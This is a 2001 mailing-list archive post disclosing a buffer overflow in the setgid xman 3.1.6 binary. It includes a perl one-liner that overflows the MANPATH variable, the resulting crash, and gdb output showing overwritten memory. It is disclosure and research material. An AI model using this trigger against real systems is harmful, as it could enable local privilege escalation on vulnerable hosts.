Vulnerability Development mailing list archives

Previous By Date Next
Previous By Thread Next

[Fwd: suid xman 3.1.6 overflows]

From: KF <dotslash () snosoft com>
Date: Thu, 12 Jul 2001 21:35:13 -0400
I tried to send this to Bugtraq right about the same time I had
connection issues... not sure if it was denied so I figured I would try
to send it to 
vuln-dev just incase. 
-KF 

-------- Original Message --------
Subject: suid xman 3.1.6 overflows
Date: Wed, 11 Jul 2001 23:32:49 -0400
From: KF <dotslash () snosoft com>
To: bugtraq () securityfocus com, srtxg () chanae alphanet ch

xman from at least X11R6-contrib-3.3.2-3.i386.rpm suffers from a classic
overflow 

srtxg () chanae alphanet ch is noted as the packager of this RPM. I do not
know 
the author. 

[root@linux lib]# ls -al `which xman`
-rwxr-sr-x    1 root     man         41076 Jun 17  1998
/usr/X11R6/bin/xman*

[root@linux lib]# xman
[root@linux lib]# export MANPATH=`perl -e 'print "A" x 7000'`
[root@linux lib]# xman
Xman Error: Could not allocate memory for manual sections.

[root@linux lib]# export MANPATH=`perl -e 'print "A" x 70000'`
[root@linux lib]# xman
Segmentation fault

[root@linux lib]# gdb xman
GNU gdb 5.0mdk-11mdk Linux-Mandrake 8.0
(gdb) run
Starting program: /usr/X11R6/bin/xman
0x4022fb66 in getenv () from /lib/libc.so.6
(gdb) bt
#0  0x4022fb66 in getenv () from /lib/libc.so.6
#1  0x0804bc47 in _start ()
#2  0x41414141 in ?? ()
Cannot access memory at address 0x41414141

(gdb) info registers
eax            0xbffee784       -1073813628
ecx            0x804fb29        134544169
edx            0x805414c        134562124
ebx            0x40328f2c       1077055276
esp            0xbffec6fc       0xbffec6fc
ebp            0xbffec714       0xbffec714
esi            0x6      6
edi            0x41414141       1094795585
eip            0x4022fb66       0x4022fb66

-KF
Previous By Date Next
Previous By Thread Next

Current thread: